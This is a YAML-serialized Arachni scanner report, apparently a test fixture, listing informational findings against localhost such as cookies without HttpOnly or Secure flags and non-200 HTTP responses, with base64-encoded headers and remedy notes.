!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: HTML object
description: Greps pages for HTML objects.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
mod_name: HTML objects
variations: []
internal_modname: HTMLObjects
internal_modname: HTMLObjects
- !ruby/object:Arachni::Issue
verification: false
references:
HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
var: cookie
url: http://localhost:14530/
elem: cookie
method: GET
name: HttpOnly cookie
description: ! "The logged cookie does not have the HttpOnly\n flag set which
makes it succeptible to maniplation via client-side code."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'HttpOnly' flag in the cookie.
mod_name: HttpOnly cookies
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
opts:
:var: !binary |-
Y29va2ll
:element: cookie
:regexp: ''
var: cookie
url: http://localhost:14530/
injected:
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==":
- !binary |-
Y29va2llPXZhbHVl
- !binary |-
Y29va2llMj12YWx1ZTI=
- !binary |-
Y29va2llMz12YWx1ZTM7IEh0dHBPbmx5
- !binary |-
Y29va2llND12YWx1ZTQ7IEh0dHBPbmx5
name: HttpOnly cookie
description: ! "The logged cookie does not have the HttpOnly\n flag set which
makes it succeptible to maniplation via client-side code."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'HttpOnly' flag in the cookie.
mod_name: HttpOnly cookies
variations: []
internal_modname: HttpOnlyCookies
internal_modname: HttpOnlyCookies
- !ruby/object:Arachni::Issue
verification: false
references:
HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
var: cookie2
url: http://localhost:14530/
elem: cookie
method: GET
name: HttpOnly cookie
description: ! "The logged cookie does not have the HttpOnly\n flag set which
makes it succeptible to maniplation via client-side code."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'HttpOnly' flag in the cookie.
mod_name: HttpOnly cookies
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
HttpOnly - OWASP: https://www.owasp.org/index.php/HttpOnly
opts:
:var: !binary |-
Y29va2llMg==
:element: cookie
:regexp: ''
var: cookie2
url: http://localhost:14530/
injected:
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==":
- !binary |-
Y29va2llPXZhbHVl
- !binary |-
Y29va2llMj12YWx1ZTI=
- !binary |-
Y29va2llMz12YWx1ZTM7IEh0dHBPbmx5
- !binary |-
Y29va2llND12YWx1ZTQ7IEh0dHBPbmx5
name: HttpOnly cookie
description: ! "The logged cookie does not have the HttpOnly\n flag set which
makes it succeptible to maniplation via client-side code."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'HttpOnly' flag in the cookie.
mod_name: HttpOnly cookies
variations: []
internal_modname: HttpOnlyCookies
internal_modname: HttpOnlyCookies
- !ruby/object:Arachni::Issue
verification: false
references:
SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
var: cookie
url: http://localhost:11400/
elem: cookie
method: GET
name: Insecure cookie
description: ! "The logged cookie is allowed to be served over\n an unencrypted
channel which makes it susceptible to sniffing."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'Secure' flag in the cookie.
mod_name: Insecure cookies
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
opts:
:var: !binary |-
Y29va2ll
:element: cookie
:regexp: ''
var: cookie
url: http://localhost:11400/
injected:
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==":
- !binary |-
Y29va2llPXZhbHVl
- !binary |-
Y29va2llMj12YWx1ZTI=
- !binary |-
Y29va2llMz12YWx1ZTM7IHNlY3VyZQ==
- !binary |-
Y29va2llND12YWx1ZTQ7IHNlY3VyZQ==
name: Insecure cookie
description: ! "The logged cookie is allowed to be served over\n an unencrypted
channel which makes it susceptible to sniffing."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'Secure' flag in the cookie.
mod_name: Insecure cookies
variations: []
internal_modname: InsecureCookies
internal_modname: InsecureCookies
- !ruby/object:Arachni::Issue
verification: false
references:
SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
var: cookie2
url: http://localhost:11400/
elem: cookie
method: GET
name: Insecure cookie
description: ! "The logged cookie is allowed to be served over\n an unencrypted
channel which makes it susceptible to sniffing."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'Secure' flag in the cookie.
mod_name: Insecure cookies
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecureFlag - OWASP: https://www.owasp.org/index.php/SecureFlag
opts:
:var: !binary |-
Y29va2llMg==
:element: cookie
:regexp: ''
var: cookie2
url: http://localhost:11400/
injected:
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=value;cookie2=value2;cookie3=value3;cookie4=value4
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
!binary "U2V0LUNvb2tpZQ==":
- !binary |-
Y29va2llPXZhbHVl
- !binary |-
Y29va2llMj12YWx1ZTI=
- !binary |-
Y29va2llMz12YWx1ZTM7IHNlY3VyZQ==
- !binary |-
Y29va2llND12YWx1ZTQ7IHNlY3VyZQ==
name: Insecure cookie
description: ! "The logged cookie is allowed to be served over\n an unencrypted
channel which makes it susceptible to sniffing."
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: Set the 'Secure' flag in the cookie.
mod_name: Insecure cookies
variations: []
internal_modname: InsecureCookies
internal_modname: InsecureCookies
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/201
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 201'
:element: server
:regexp: ''
var:
url: http://localhost:10473/201
injected:
id: ! 'Code: 201'
regexp: ''
regexp_match:
elem: server
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: '2017960'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/206
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 206'
:element: server
:regexp: ''
var:
url: http://localhost:10473/206
injected:
id: ! 'Code: 206'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2067257'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/207
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 207'
:element: server
:regexp: ''
var:
url: http://localhost:10473/207
injected:
id: ! 'Code: 207'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2073403'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/202
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 202'
:element: server
:regexp: ''
var:
url: http://localhost:10473/202
injected:
id: ! 'Code: 202'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2024871'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/208
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 208'
:element: server
:regexp: ''
var:
url: http://localhost:10473/208
injected:
id: ! 'Code: 208'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2089330'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/203
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 203'
:element: server
:regexp: ''
var:
url: http://localhost:10473/203
injected:
id: ! 'Code: 203'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2035153'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/403
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 403'
:element: server
:regexp: ''
var:
url: http://localhost:10473/403
injected:
id: ! 'Code: 403'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4037226'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/226
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 226'
:element: server
:regexp: ''
var:
url: http://localhost:10473/226
injected:
id: ! 'Code: 226'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '2264648'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/300
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 300'
:element: server
:regexp: ''
var:
url: http://localhost:10473/300
injected:
id: ! 'Code: 300'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '3003455'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/405
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 405'
:element: server
:regexp: ''
var:
url: http://localhost:10473/405
injected:
id: ! 'Code: 405'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4056256'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations: []
internal_modname: InterestingResponses
internal_modname: InterestingResponses
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
var:
url: http://localhost:10473/407
elem: server
method: GET
name: Interesting response
description: ! 'The server responded with a non 200 (OK) code. '
tags:
- interesting
- response
- server
severity: Informational
mod_name: Interesting responses
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
opts:
:id: ! 'Code: 407'
:element: server
:regexp: ''
var:
url: http://localhost:10473/407
injected:
id: ! 'Code: 407'
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: '4077160'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
